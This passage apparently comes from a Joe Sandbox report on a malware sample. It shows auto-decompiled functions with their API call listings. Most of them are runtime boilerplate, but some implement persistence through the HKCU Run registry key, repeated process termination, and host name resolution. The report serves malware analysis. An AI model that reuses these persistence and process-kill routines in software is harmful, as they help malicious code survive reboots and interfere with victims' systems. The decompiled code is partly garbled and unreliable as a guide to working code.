    				 *(_t98 - 0x20) = _t52;
    				if(_t52 != 0) {
    					__eflags = _t52 - 0xffffffff;
    					if(_t52 == 0xffffffff) {
    						__eflags = _t73 - 0x300b450;
    						if(_t73 != 0x300b450) {
    							E03006891(_t73);
    						}
    						 *((intOrPtr*)(E03003EA5())) = 0x16;
    					}
    				} else {
    					_t97 =  *((intOrPtr*)(_t98 - 0x24));
    					if(InterlockedDecrement( *(_t97 + 0x68)) == 0) {
    						_t69 =  *(_t97 + 0x68);
    						if( *(_t97 + 0x68) != 0x300b450) {
    							E03006891(_t69);
    						}
    					}
    					 *(_t97 + 0x68) = _t73;
    					InterlockedIncrement(_t73);
    					if(( *(_t97 + 0x70) & 0x00000002) == 0 && ( *0x300b970 & 0x00000001) == 0) {
    						E03006E8E(_t73, InterlockedIncrement, 0xd);
    						 *(_t98 - 4) =  *(_t98 - 4) & 0x00000000;
    						 *0x300c664 = _t73[1];
    						 *0x300c668 = _t73[2];
    						 *0x300c66c = _t73[3];
    						_t61 = 0;
    						while(1) {
    							 *(_t98 - 0x1c) = _t61;
    							if(_t61 >= 5) {
    								break;
    							}
    							 *((short*)(0x300c658 + _t61 * 2)) =  *((intOrPtr*)(_t73 + 0x10 + _t61 * 2));
    							_t61 = _t61 + 1;
    						}
    						_t62 = 0;
    						__eflags = 0;
    						while(1) {
    							 *(_t98 - 0x1c) = _t62;
    							__eflags = _t62 - 0x101;
    							if(_t62 >= 0x101) {
    								break;
    							}
    							 *((char*)(_t62 + 0x300b670)) =  *((intOrPtr*)( &(_t73[7]) + _t62));
    							_t62 = _t62 + 1;
    						}
    						_t63 = 0;
    						__eflags = 0;
    						while(1) {
    							 *(_t98 - 0x1c) = _t63;
    							__eflags = _t63 - 0x100;
    							if(_t63 >= 0x100) {
    								break;
    							}
    							 *((char*)(_t63 + 0x300b778)) =  *((intOrPtr*)( &(_t73[0x47]) + _t63));
    							_t63 = _t63 + 1;
    						}
    						_t64 = InterlockedDecrement( *0x300b878);
    						__eflags = _t64;
    						if(_t64 == 0) {
    							_t67 =  *0x300b878; // 0x300b450
    							__eflags = _t67 - 0x300b450;
    							if(_t67 != 0x300b450) {
    								E03006891(_t67);
    							}
    						}
    						 *0x300b878 = _t73;
    						InterlockedIncrement(_t73);
    						 *(_t98 - 4) = 0xfffffffe;
    						E03006501();
    					}
    				}
    			}

    APIs
    • __getptd.LIBCMT ref: 030063B0
      • Part of subcall function 03004D40: __amsg_exit.LIBCMT ref: 03004D50
      • Part of subcall function 03006097: __getptd.LIBCMT ref: 030060A3
      • Part of subcall function 03006097: __amsg_exit.LIBCMT ref: 030060C3
      • Part of subcall function 03006097: InterlockedDecrement.KERNEL32(?), ref: 030060F0
      • Part of subcall function 03006097: InterlockedIncrement.KERNEL32(0300B450), ref: 0300611B
      • Part of subcall function 0300613B: GetOEMCP.KERNEL32(00000000), ref: 03006164
      • Part of subcall function 0300613B: GetACP.KERNEL32(00000000), ref: 03006187
      • Part of subcall function 030068EE: Sleep.KERNEL32(00000000,00000001,?,?,03006E19,00000018,03009958,0000000C,03006EA9,?,?,?,03004C5D,0000000D), ref: 0300690F
      • Part of subcall function 030061B7: setSBCS.LIBCMT ref: 030061E4
      • Part of subcall function 030061B7: IsValidCodePage.KERNEL32(-00000030), ref: 0300622A
      • Part of subcall function 030061B7: GetCPInfo.KERNEL32(00000000,?), ref: 0300623D
      • Part of subcall function 030061B7: setSBUpLow.LIBCMT ref: 0300632B
    • InterlockedDecrement.KERNEL32(?), ref: 03006416
    • InterlockedIncrement.KERNEL32(00000000), ref: 0300643B
      • Part of subcall function 03006E8E: __amsg_exit.LIBCMT ref: 03006EB0
      • Part of subcall function 03006E8E: EnterCriticalSection.KERNEL32(?,?,?,03004C5D,0000000D), ref: 03006EB8
    • InterlockedDecrement.KERNEL32 ref: 030064CD
    • InterlockedIncrement.KERNEL32(00000000), ref: 030064F1
      • Part of subcall function 03006891: HeapFree.KERNEL32(00000000,00000000), ref: 030068A7
      • Part of subcall function 03006891: GetLastError.KERNEL32(00000000,?,03004D31,00000000,?,03003EAA,03002BF3), ref: 030068B9
    Memory Dump Source
    • Source File: 00000002.00000002.1468041017.03001000.00000020.sdmp, Offset: 03000000, based on PE: true
    • Associated: 00000002.00000002.1468029210.03000000.00000002.sdmp
    • Associated: 00000002.00000002.1468050212.0300B000.00000008.sdmp
    • Associated: 00000002.00000002.1468058188.0300C000.00000004.sdmp
    • Associated: 00000002.00000002.1468067852.03014000.00000002.sdmp
    Joe Sandbox IDA Plugin
    • Snapshot File: hcaresult_2_2_3000000_obtG43AWHP.jbxd
    C-Code - Quality: 24%
    			E03004081(void* __ebx, void* __edi, void* __esi, void* __eflags) {
    				void* _t36;
    				intOrPtr* _t40;
    				intOrPtr _t45;
    				intOrPtr _t47;
    				intOrPtr* _t52;
    				intOrPtr* _t54;
    				void* _t55;
    				void* _t57;
    
    				_push(0x20);
    				_push(0x3009828);
    				E03005030(__ebx, __edi, __esi);
    				E03006E8E(__ebx, __edi, 8);
    				 *(_t55 - 4) =  *(_t55 - 4) & 0x00000000;
    				_t57 =  *0x300be00 - 1; // 0x0
    				if(_t57 != 0) {
    					 *0x300bdfc = 1;
    					_t34 =  *((intOrPtr*)(_t55 + 0x10));
    					 *0x300bdf8 =  *((intOrPtr*)(_t55 + 0x10));
    					if( *((intOrPtr*)(_t55 + 0xc)) == 0) {
    						_t54 = __imp__DecodePointer;
    						_t34 =  *_t54( *0x3013088);
    						_t45 = 1;
    						 *((intOrPtr*)(_t55 - 0x30)) = 1;
    						if(1 != 0) {
    							_t34 =  *_t54( *0x3013084);
    							_t52 = 1;
    							 *((intOrPtr*)(_t55 - 0x2c)) = 1;
    							 *((intOrPtr*)(_t55 - 0x24)) = 1;
    							 *((intOrPtr*)(_t55 - 0x28)) = 1;
    							while(1) {
    								_t52 = _t52 - 4;
    								 *((intOrPtr*)(_t55 - 0x2c)) = _t52;
    								if(_t52 < _t45) {
    									goto L11;
    								}
    								if( *_t52 == _t34) {
    									continue;
    								} else {
    									if(_t52 >= _t45) {
    										_t40 =  *_t54( *_t52);
    										 *_t52 = E03004B90(_t40);
    										 *_t40();
    										_t47 =  *_t54( *0x3013088);
    										_t34 =  *_t54( *0x3013084);
    										if( *((intOrPtr*)(_t55 - 0x24)) != _t47 ||  *((intOrPtr*)(_t55 - 0x28)) != _t34) {
    											 *((intOrPtr*)(_t55 - 0x24)) = _t47;
    											 *((intOrPtr*)(_t55 - 0x30)) = _t47;
    											 *((intOrPtr*)(_t55 - 0x28)) = _t34;
    											_t52 = _t34;
    											 *((intOrPtr*)(_t55 - 0x2c)) = _t52;
    										}
    										_t45 =  *((intOrPtr*)(_t55 - 0x30));
    										continue;
    									}
    								}
    								goto L11;
    							}
    						}
    						L11:
    						 *((intOrPtr*)(_t55 - 0x1c)) = 0x3001164;
    						while( *((intOrPtr*)(_t55 - 0x1c)) < 0x3001170) {
    							_t34 =  *((intOrPtr*)( *((intOrPtr*)(_t55 - 0x1c))));
    							if(_t34 != 0) {
    								_t34 =  *_t34();
    							}
    							 *((intOrPtr*)(_t55 - 0x1c)) =  *((intOrPtr*)(_t55 - 0x1c)) + 4;
    						}
    					}
    					 *((intOrPtr*)(_t55 - 0x20)) = 0x3001174;
    					while( *((intOrPtr*)(_t55 - 0x20)) < 0x3001178) {
    						_t34 =  *((intOrPtr*)( *((intOrPtr*)(_t55 - 0x20))));
    						if(_t34 != 0) {
    							_t34 =  *_t34();
    						}
    						 *((intOrPtr*)(_t55 - 0x20)) =  *((intOrPtr*)(_t55 - 0x20)) + 4;
    					}
    				}
    				 *(_t55 - 4) = 0xfffffffe;
    				L23();
    				if( *((intOrPtr*)(_t55 + 0x10)) != 0) {
    					return E03005075(_t34);
    				} else {
    					 *0x300be00 = 1;
    					_t36 = E03006DB5(8);
    					E03003F69( *((intOrPtr*)(_t55 + 8)));
    					if( *((intOrPtr*)(_t55 + 0x10)) != 0) {
    						return E03006DB5(8);
    					}
    					return _t36;
    				}
    			}












    APIs
      • Part of subcall function 03006E8E: __amsg_exit.LIBCMT ref: 03006EB0
      • Part of subcall function 03006E8E: EnterCriticalSection.KERNEL32(?,?,?,03004C5D,0000000D), ref: 03006EB8
    • DecodePointer.KERNEL32(03009828,00000020,030041E8,?,00000001,00000000,?,03004228,000000FF,?,03006EB5,00000011,?,?,03004C5D,0000000D), ref: 030040CB
    • DecodePointer.KERNEL32(?,03004228,000000FF,?,03006EB5,00000011,?,?,03004C5D,0000000D), ref: 030040DC
      • Part of subcall function 03004B90: EncodePointer.KERNEL32(00000000,030073D2,0300BE08,00000314,00000000,?,?,?,?,?,0300438C,0300BE08,Microsoft Visual C++ Runtime Library,00012010), ref: 03004B92
    • DecodePointer.KERNEL32(-00000004,?,03004228,000000FF,?,03006EB5,00000011,?,?,03004C5D,0000000D), ref: 03004102
    • DecodePointer.KERNEL32(?,03004228,000000FF,?,03006EB5,00000011,?,?,03004C5D,0000000D), ref: 03004115
    • DecodePointer.KERNEL32(?,03004228,000000FF,?,03006EB5,00000011,?,?,03004C5D,0000000D), ref: 0300411F
      • Part of subcall function 03006DB5: LeaveCriticalSection.KERNEL32(?,03006E8C,0000000A,03006E7C,03009958,0000000C,03006EA9,?,?,?,03004C5D,0000000D), ref: 03006DC4
      • Part of subcall function 03003F69: ExitProcess.KERNEL32 ref: 03003F7A
    Memory Dump Source
    • Source File: 00000002.00000002.1468041017.03001000.00000020.sdmp, Offset: 03000000, based on PE: true
    • Associated: 00000002.00000002.1468029210.03000000.00000002.sdmp
    • Associated: 00000002.00000002.1468050212.0300B000.00000008.sdmp
    • Associated: 00000002.00000002.1468058188.0300C000.00000004.sdmp
    • Associated: 00000002.00000002.1468067852.03014000.00000002.sdmp
    Joe Sandbox IDA Plugin
    • Snapshot File: hcaresult_2_2_3000000_obtG43AWHP.jbxd
    C-Code - Quality: 21%
    			E0300711B(intOrPtr _a4) {
    				intOrPtr _v8;
    				intOrPtr _t11;
    				intOrPtr _t13;
    				void* _t19;
    				intOrPtr _t22;
    				void* _t23;
    				intOrPtr _t24;
    				void* _t26;
    				void* _t27;
    				void* _t33;
    				signed int _t36;
    				intOrPtr* _t37;
    				void* _t39;
    				intOrPtr* _t40;
    				intOrPtr* _t41;
    
    				_t40 = __imp__DecodePointer;
    				_t11 =  *_t40( *0x3013088, _t33, _t39, _t23, _t27);
    				_t24 = _t11;
    				_v8 = _t24;
    				_t41 =  *_t40( *0x3013084);
    				if(_t41 < _t24) {
    					L11:
    					_t13 = 0;
    				} else {
    					_t36 = _t41 - _t24;
    					_t2 = _t36 + 4; // 0x4
    					if(_t2 < 4) {
    						goto L11;
    					} else {
    						_t26 = E03008D8B(_t24);
    						_t3 = _t36 + 4; // 0x4
    						if(_t26 >= _t3) {
    							L10:
    							_t37 = __imp__EncodePointer;
    							 *_t41 =  *_t37(_a4);
    							 *0x3013084 =  *_t37(_t41 + 4);
    							_t13 = _a4;
    						} else {
    							_t19 = 0x800;
    							if(_t26 < 0x800) {
    								_t19 = _t26;
    							}
    							_t20 = _t19 + _t26;
    							if(_t19 + _t26 < _t26) {
    								L7:
    								_t5 = _t26 + 0x10; // 0x10
    								_t21 = _t5;
    								if(_t5 < _t26) {
    									goto L11;
    								} else {
    									_t22 = E0300697F(_v8, _t21);
    									if(_t22 == 0) {
    										goto L11;
    									} else {
    										goto L9;
    									}
    								}
    							} else {
    								_t22 = E0300697F(_v8, _t20);
    								if(_t22 != 0) {
    									L9:
    									_t41 = _t22 + (_t36 >> 2) * 4;
    									__imp__EncodePointer(_t22);
    									 *0x3013088 = _t22;
    									goto L10;
    								} else {
    									goto L7;
    								}
    							}
    						}
    					}
    				}
    				return _t13;
    			}



















    APIs
    • DecodePointer.KERNEL32(?,?,?,?,?,0300721F,?,03009998,0000000C,0300724B,?,?,03004037,03004B6A), ref: 03007130
    • DecodePointer.KERNEL32(?,?,?,?,?,0300721F,?,03009998,0000000C,0300724B,?,?,03004037,03004B6A), ref: 0300713D
      • Part of subcall function 03008D8B: HeapSize.KERNEL32(00000000,00000000,?,00000003,03006CFD,03009938,00000008,03003F2A), ref: 03008DB6
      • Part of subcall function 0300697F: Sleep.KERNEL32(00000000,00000000,00000000,?,03007195,00000000,00000010,?,?,?,?,?,0300721F,?,03009998,0000000C), ref: 030069A9
    • EncodePointer.KERNEL32(00000000,?,?,?,?,?,0300721F,?,03009998,0000000C,0300724B,?,?,03004037,03004B6A), ref: 030071A2
    • EncodePointer.KERNEL32(?,?,?,?,?,?,0300721F,?,03009998,0000000C,0300724B,?,?,03004037,03004B6A), ref: 030071B6
    • EncodePointer.KERNEL32(-00000004,?,?,?,?,?,0300721F,?,03009998,0000000C,0300724B,?,?,03004037,03004B6A), ref: 030071BE
    Memory Dump Source
    • Source File: 00000002.00000002.1468041017.03001000.00000020.sdmp, Offset: 03000000, based on PE: true
    • Associated: 00000002.00000002.1468029210.03000000.00000002.sdmp
    • Associated: 00000002.00000002.1468050212.0300B000.00000008.sdmp
    • Associated: 00000002.00000002.1468058188.0300C000.00000004.sdmp
    • Associated: 00000002.00000002.1468067852.03014000.00000002.sdmp
    Joe Sandbox IDA Plugin
    • Snapshot File: hcaresult_2_2_3000000_obtG43AWHP.jbxd
    C-Code - Quality: 100%
    			E0300521F() {
    				struct _FILETIME _v12;
    				signed int _v16;
    				union _LARGE_INTEGER _v20;
    				signed int _t14;
    				signed int _t16;
    				signed int _t17;
    				signed int _t18;
    				signed int _t22;
    				signed int _t25;
    				signed int _t34;
    
    				_t14 =  *0x300bbe4; // 0xbb40e64e
    				_v12.dwLowDateTime = _v12.dwLowDateTime & 0x00000000;
    				_v12.dwHighDateTime = _v12.dwHighDateTime & 0x00000000;
    				if(_t14 == 0xbb40e64e || (0xffff0000 & _t14) == 0) {
    					GetSystemTimeAsFileTime( &_v12);
    					_t16 = GetCurrentProcessId();
    					_t17 = GetCurrentThreadId();
    					_t18 = GetTickCount();
    					QueryPerformanceCounter( &_v20);
    					_t22 = _v16 ^ _v20.LowPart;
    					_t34 = _v12.dwHighDateTime ^ _v12.dwLowDateTime ^ _t16 ^ _t17 ^ _t18 ^ _t22;
    					if(_t34 != 0xbb40e64e) {
    						if((0xffff0000 & _t34) == 0) {
    							_t22 = (_t34 | 0x00004711) << 0x10;
    							_t34 = _t34 | _t22;
    						}
    					} else {
    						_t34 = 0xbb40e64f;
    					}
    					 *0x300bbe4 = _t34;
    					 *0x300bbe8 =  !_t34;
    					return _t22;
    				} else {
    					_t25 =  !_t14;
    					 *0x300bbe8 = _t25;
    					return _t25;
    				}
    			}














    APIs
    • GetSystemTimeAsFileTime.KERNEL32(00000000), ref: 03005256
    • GetCurrentProcessId.KERNEL32 ref: 03005262
    • GetCurrentThreadId.KERNEL32 ref: 0300526A
    • GetTickCount.KERNEL32 ref: 03005272
    • QueryPerformanceCounter.KERNEL32(?), ref: 0300527E
    Memory Dump Source
    • Source File: 00000002.00000002.1468041017.03001000.00000020.sdmp, Offset: 03000000, based on PE: true
    • Associated: 00000002.00000002.1468029210.03000000.00000002.sdmp
    • Associated: 00000002.00000002.1468050212.0300B000.00000008.sdmp
    • Associated: 00000002.00000002.1468058188.0300C000.00000004.sdmp
    • Associated: 00000002.00000002.1468067852.03014000.00000002.sdmp
    Joe Sandbox IDA Plugin
    • Snapshot File: hcaresult_2_2_3000000_obtG43AWHP.jbxd
    C-Code - Quality: 64%
    			E0040A038(void* __esi, void* __eflags) {
    				char _v8;
    				intOrPtr* _t18;
    				intOrPtr _t26;
    				void* _t27;
    				long _t29;
    				intOrPtr _t32;
    				void* _t33;
    
    				_t33 = __eflags;
    				_push(0);
    				_push(_t32);
    				_push(0x40a0cf);
    				_push( *[fs:eax]);
    				 *[fs:eax] = _t32;
    				E00409DB0(GetThreadLocale(), 0x40a0e4, 0x100b,  &_v8);
    				_t29 = E00407174(0x40a0e4, 1, _t33);
    				if(_t29 + 0xfffffffd - 3 < 0) {
    					EnumCalendarInfoA(E00409F84, GetThreadLocale(), _t29, 4);
    					_t27 = 7;
    					_t18 = 0x454764;
    					do {
    						 *_t18 = 0xffffffff;
    						_t18 = _t18 + 4;
    						_t27 = _t27 - 1;
    					} while (_t27 != 0);
    					EnumCalendarInfoA(E00409FC0, GetThreadLocale(), _t29, 3);
    				}
    				_pop(_t26);
    				 *[fs:eax] = _t26;
    				_push(E0040A0D6);
    				return E00403E88( &_v8);
    			}











    APIs
    • GetThreadLocale.KERNEL32(?,00000000,0040A0CF,?,?,00000000), ref: 0040A050
      • Part of subcall function 00409DB0: GetLocaleInfoA.KERNEL32(?,?,?,00000100), ref: 00409DCE
    • GetThreadLocale.KERNEL32(00000000,00000004,00000000,0040A0CF,?,?,00000000), ref: 0040A080
    • EnumCalendarInfoA.KERNEL32(Function_00009F84,00000000,00000000,00000004), ref: 0040A08B
    • GetThreadLocale.KERNEL32(00000000,00000003,00000000,0040A0CF,?,?,00000000), ref: 0040A0A9
    • EnumCalendarInfoA.KERNEL32(Function_00009FC0,00000000,00000000,00000003), ref: 0040A0B4
    Memory Dump Source
    • Source File: 00000002.00000002.1459352287.00400000.00000040.sdmp, Offset: 00400000, based on PE: true
    Joe Sandbox IDA Plugin
    • Snapshot File: hcaresult_2_2_400000_obtG43AWHP.jbxd
    C-Code - Quality: 82%
    			E0040A0E8(void* __eax, void* __ebx, void* __edx, void* __edi, void* __esi, void* __eflags) {
    				intOrPtr _v8;
    				char _v12;
    				intOrPtr _v16;
    				char _v20;
    				char _v24;
    				void* _t41;
    				signed int _t45;
    				signed int _t47;
    				signed int _t49;
    				signed int _t51;
    				intOrPtr _t75;
    				void* _t76;
    				signed int _t77;
    				signed int _t83;
    				signed int _t92;
    				intOrPtr _t111;
    				void* _t122;
    				void* _t124;
    				intOrPtr _t127;
    				void* _t128;
    
    				_t128 = __eflags;
    				_push(0);
    				_push(0);
    				_push(0);
    				_push(0);
    				_push(0);
    				_t122 = __edx;
    				_t124 = __eax;
    				_push(_t127);
    				_push(0x40a2b2);
    				_push( *[fs:eax]);
    				 *[fs:eax] = _t127;
    				_t92 = 1;
    				E00403E88(__edx);
    				E00409DB0(GetThreadLocale(), 0x40a2c8, 0x1009,  &_v12);
    				if(E00407174(0x40a2c8, 1, _t128) + 0xfffffffd - 3 < 0) {
    					while(1) {
    						_t41 = E00404148(_t124);
    						__eflags = _t92 - _t41;
    						if(_t92 > _t41) {
    							goto L28;
    						}
    						__eflags =  *(_t124 + _t92 - 1) & 0x000000ff;
    						asm("bt [0x419108], eax");
    						if(( *(_t124 + _t92 - 1) & 0x000000ff) >= 0) {
    							_t45 = E004077C0(_t124 + _t92 - 1, 2, 0x40a2cc);
    							__eflags = _t45;
    							if(_t45 != 0) {
    								_t47 = E004077C0(_t124 + _t92 - 1, 4, 0x40a2dc);
    								__eflags = _t47;
    								if(_t47 != 0) {
    									_t49 = E004077C0(_t124 + _t92 - 1, 2, 0x40a2f4);
    									__eflags = _t49;
    									if(_t49 != 0) {
    										_t51 =  *(_t124 + _t92 - 1) - 0x59;
    										__eflags = _t51;
    										if(_t51 == 0) {
    											L24:
    											E00404150(_t122, 0x40a30c);
    										} else {
    											__eflags = _t51 != 0x20;
    											if(_t51 != 0x20) {
    												E00404070();
    												E00404150(_t122, _v24);
    											} else {
    												goto L24;
    											}
    										}
    									} else {
    										E00404150(_t122, 0x40a300);
    										_t92 = _t92 + 1;
    									}
    								} else {
    									E00404150(_t122, 0x40a2ec);
    									_t92 = _t92 + 3;
    								}
    							} else {
    								E00404150(_t122, 0x40a2d8);
    								_t92 = _t92 + 1;
    							}
    							_t92 = _t92 + 1;
    							__eflags = _t92;
    						} else {
    							_v8 = E0040B04C(_t124, _t92);
    							E004043A8(_t124, _v8, _t92,  &_v20);
    							E00404150(_t122, _v20);
    							_t92 = _t92 + _v8;
    						}
    					}
    				} else {
    					_t75 =  *0x45473c; // 0x9
    					_t76 = _t75 - 4;
    					if(_t76 == 0 || _t76 + 0xfffffff3 - 2 < 0) {
    						_t77 = 1;
    					} else {
    						_t77 = 0;
    					}
    					if(_t77 == 0) {
    						E00403EDC(_t122, _t124);
    					} else {
    						while(_t92 <= E00404148(_t124)) {
    							_t83 =  *(_t124 + _t92 - 1) - 0x47;
    							__eflags = _t83;
    							if(_t83 != 0) {
    								__eflags = _t83 != 0x20;
    								if(_t83 != 0x20) {
    									E00404070();
    									E00404150(_t122, _v16);
    								}
    							}
    							_t92 = _t92 + 1;
    							__eflags = _t92;
    						}
    					}
    				}
    				L28:
    				_pop(_t111);
    				 *[fs:eax] = _t111;
    				_push(E0040A2B9);
    				return E00403EAC( &_v24, 4);
    			}
























    APIs
    • GetThreadLocale.KERNEL32(?,00000000,0040A2B2,?,?,?,?,00000000,00000000,00000000,00000000,00000000), ref: 0040A117
      • Part of subcall function 00409DB0: GetLocaleInfoA.KERNEL32(?,?,?,00000100), ref: 00409DCE
    Strings
    Memory Dump Source
    • Source File: 00000002.00000002.1459352287.00400000.00000040.sdmp, Offset: 00400000, based on PE: true
    Joe Sandbox IDA Plugin
    • Snapshot File: hcaresult_2_2_400000_obtG43AWHP.jbxd
    C-Code - Quality: 90%
    			E0041763C(void* __ecx, intOrPtr* __edx) {
    				char _v20;
    				intOrPtr _v24;
    				char _v28;
    				intOrPtr _v32;
    				char _v36;
    				intOrPtr _v40;
    				char _v44;
    				char _v48;
    				void* _t22;
    				void* _t35;
    				intOrPtr* _t38;
    				void* _t47;
    
    				_t47 = __ecx;
    				_t38 = __edx;
    				E00403E88(__ecx);
    				if(_t38 == 0) {
    					return E00403EDC(_t47, "0.0.0.0");
    				}
    				if( *_t38 + 0xd0 - 0xa >= 0) {
    					_t22 = E00404348(_t38);
    					_push(_t22);
    					L0040C4F8();
    					if(_t22 != 0) {
    						_v48 = 0;
    						_v44 = 0;
    						_v40 = 0;
    						_v36 = 0;
    						_v32 = 0;
    						_v28 = 0;
    						_v24 = 0;
    						_v20 = 0;
    						return E00407CEC("%d.%d.%d.%d", 3,  &_v48, _t47);
    					}
    				} else {
    					_t35 = E00404348(_t38);
    					_push(_t35);
    					L0040C4C8();
    					_t22 = _t35 + 1;
    					if(_t22 != 0) {
    						return E00403EDC(_t47, _t38);
    					}
    				}
    				return _t22;
    			}
















    APIs
    • inet_addr.WSOCK32(00000000), ref: 00417665
    • gethostbyname.WSOCK32(00000000), ref: 00417680
    Strings
    Memory Dump Source
    • Source File: 00000002.00000002.1459352287.00400000.00000040.sdmp, Offset: 00400000, based on PE: true
    Joe Sandbox IDA Plugin
    • Snapshot File: hcaresult_2_2_400000_obtG43AWHP.jbxd
    C-Code - Quality: 68%
    			E004185E8(intOrPtr __eax, void* __ebx, char __edx) {
    				intOrPtr _v8;
    				char _v12;
    				void* _v16;
    				char _v20;
    				int _t28;
    				char* _t41;
    				intOrPtr _t47;
    				void* _t51;
    
    				_v20 = 0;
    				_v12 = __edx;
    				_v8 = __eax;
    				E00404338(_v8);
    				E00404338(_v12);
    				_push(_t51);
    				_push(0x418692);
    				_push( *[fs:eax]);
    				 *[fs:eax] = _t51 + 0xfffffff0;
    				RegOpenKeyExA(0x80000001, "software\\microsoft\\windows\\currentversion\\run", 0, 0xf003f,  &_v16);
    				_t41 = E00404348(_v12);
    				E00404080( &_v20, _t41);
    				_t28 = E00404148(_v20);
    				RegSetValueExA(_v16, E00404348(_v8), 0, 1, _t41, _t28);
    				RegCloseKey(_v16);
    				_pop(_t47);
    				 *[fs:eax] = _t47;
    				_push(E00418699);
    				E00403E88( &_v20);
    				return E00403EAC( &_v12, 2);
    			}












    APIs
    • RegOpenKeyExA.ADVAPI32(80000001,software\microsoft\windows\currentversion\run,00000000,000F003F,?,00000000,00418692,?,00000000), ref: 0041862D
    • RegSetValueExA.ADVAPI32(?,00000000,00000000,00000001,00000000,00000000,80000001,software\microsoft\windows\currentversion\run,00000000,000F003F,?,00000000,00418692,?,00000000), ref: 00418661
    • RegCloseKey.ADVAPI32(?,?,00000000,00000000,00000001,00000000,00000000,80000001,software\microsoft\windows\currentversion\run,00000000,000F003F,?,00000000,00418692,?,00000000), ref: 0041866A
    Strings
    • software\microsoft\windows\currentversion\run, xrefs: 00418623
    Memory Dump Source
    • Source File: 00000002.00000002.1459352287.00400000.00000040.sdmp, Offset: 00400000, based on PE: true
    Joe Sandbox IDA Plugin
    • Snapshot File: hcaresult_2_2_400000_obtG43AWHP.jbxd
    C-Code - Quality: 72%
    			E00418B04() {
    				char _v8;
    				intOrPtr* _t3;
    				long _t13;
    				void* _t20;
    				void* _t21;
    				intOrPtr _t24;
    				void* _t26;
    
    				 *((intOrPtr*)(_t3 +  *_t3)) =  *((intOrPtr*)(_t3 +  *_t3)) + _t4;
    				_push(0);
    				_t26 = 0;
    				_push(_t24);
    				_push(0x418b82);
    				_push( *[fs:eax]);
    				 *[fs:eax] = _t24;
    				L2:
    				E00403F20( &_v8,  *0x454a5c);
    				E00418A14(0x454a5c, _t20, _t21);
    				E00404294(_v8,  *0x454a5c);
    				if(_t26 != 0) {
    					_t26 = E00418560(_t26);
    					if(_t26 == 0) {
    						_t13 =  *0x454a60; // 0x0
    						TerminateProcess(OpenProcess(1, 0, _t13), 0);
    					}
    				}
    				Sleep("h N");
    				goto L2;
    			}











    APIs
      • Part of subcall function 00418A14: Sleep.KERNEL32(00002710,00000000,00418ACB,?,?,00000000,00000000,00000000,00000000,?,00418CFA,00000000,00418D4A,?,00000000,00418D7B), ref: 00418AA9
    • OpenProcess.KERNEL32(00000001,00000000,00000000,00000000,00000000,00418B82,?,?,00000000), ref: 00418B55
    • TerminateProcess.KERNEL32(00000000,00000001,00000000,00000000,00000000,00000000,00418B82,?,?,00000000), ref: 00418B5B
    • Sleep.KERNEL32(00004E20,00000000,00418B82,?,?,00000000), ref: 00418B65
    Strings
    Memory Dump Source
    • Source File: 00000002.00000002.1459352287.00400000.00000040.sdmp, Offset: 00400000, based on PE: true
    Joe Sandbox IDA Plugin
    • Snapshot File: hcaresult_2_2_400000_obtG43AWHP.jbxd
    C-Code - Quality: 75%
    			E00418B0C() {
    				char _v8;
    				long _t10;
    				void* _t17;
    				void* _t18;
    				intOrPtr _t20;
    				void* _t21;
    
    				_push(0);
    				_t21 = 0;
    				_push(0x418b82);
    				_push( *[fs:eax]);
    				 *[fs:eax] = _t20;
    				while(1) {
    					E00403F20( &_v8,  *0x454a5c);
    					E00418A14(0x454a5c, _t17, _t18);
    					E00404294(_v8,  *0x454a5c);
    					if(_t21 != 0) {
    						_t21 = E00418560(_t21);
    						if(_t21 == 0) {
    							_t10 =  *0x454a60; // 0x0
    							TerminateProcess(OpenProcess(1, 0, _t10), 0);
    						}
    					}
    					Sleep("h N");
    				}
    			}










    APIs
      • Part of subcall function 00418A14: Sleep.KERNEL32(00002710,00000000,00418ACB,?,?,00000000,00000000,00000000,00000000,?,00418CFA,00000000,00418D4A,?,00000000,00418D7B), ref: 00418AA9
    • OpenProcess.KERNEL32(00000001,00000000,00000000,00000000,00000000,00418B82,?,?,00000000), ref: 00418B55
    • TerminateProcess.KERNEL32(00000000,00000001,00000000,00000000,00000000,00000000,00418B82,?,?,00000000), ref: 00418B5B
    • Sleep.KERNEL32(00004E20,00000000,00418B82,?,?,00000000), ref: 00418B65
    Strings
    Memory Dump Source
    • Source File: 00000002.00000002.1459352287.00400000.00000040.sdmp, Offset: 00400000, based on PE: true
    Joe Sandbox IDA Plugin
    • Snapshot File: hcaresult_2_2_400000_obtG43AWHP.jbxd
    C-Code - Quality: 100%
    			E03003F3E(intOrPtr _a4) {
    				struct HINSTANCE__* _t2;
    
    				_t2 = GetModuleHandleW(L"mscoree.dll");
    				if(_t2 != 0) {
    					_t2 = GetProcAddress(_t2, "CorExitProcess");
    					if(_t2 != 0) {
    						return _t2->i(_a4);
    					}
    				}
    				return _t2;
    			}





    APIs
    • GetModuleHandleW.KERNEL32(mscoree.dll,?,03003F76,?,?,030089F4,000000FF,0000001E,00000001,00000000,00000000,?,030068FF,?,00000001,?), ref: 03003F48
    • GetProcAddress.KERNEL32(00000000,CorExitProcess,?,03003F76,?,?,030089F4,000000FF,0000001E,00000001,00000000,00000000,?,030068FF,?,00000001), ref: 03003F58
    Strings
    Memory Dump Source
    • Source File: 00000002.00000002.1468041017.03001000.00000020.sdmp, Offset: 03000000, based on PE: true
    • Associated: 00000002.00000002.1468029210.03000000.00000002.sdmp
    • Associated: 00000002.00000002.1468050212.0300B000.00000008.sdmp
    • Associated: 00000002.00000002.1468058188.0300C000.00000004.sdmp
    • Associated: 00000002.00000002.1468067852.03014000.00000002.sdmp
    Joe Sandbox IDA Plugin
    • Snapshot File: hcaresult_2_2_3000000_obtG43AWHP.jbxd
    C-Code - Quality: 100%
    			E0040BAA0() {
    				_Unknown_base(*)()* _t1;
    				struct HINSTANCE__* _t3;
    
    				_t1 = GetModuleHandleA("kernel32.dll");
    				_t3 = _t1;
    				if(_t3 != 0) {
    					_t1 = GetProcAddress(_t3, "GetDiskFreeSpaceExA");
    					 *0x41912c = _t1;
    				}
    				if( *0x41912c == 0) {
    					 *0x41912c = E004076D4;
    					return E004076D4;
    				}
    				return _t1;
    			}






    APIs
    • GetModuleHandleA.KERNEL32(kernel32.dll,?,0040C485,00000000,0040C498), ref: 0040BAA6
    • GetProcAddress.KERNEL32(00000000,GetDiskFreeSpaceExA,kernel32.dll,?,0040C485,00000000,0040C498), ref: 0040BAB7
    Strings
    Memory Dump Source
    • Source File: 00000002.00000002.1459352287.00400000.00000040.sdmp, Offset: 00400000, based on PE: true
    Joe Sandbox IDA Plugin
    • Snapshot File: hcaresult_2_2_400000_obtG43AWHP.jbxd
    C-Code - Quality: 81%
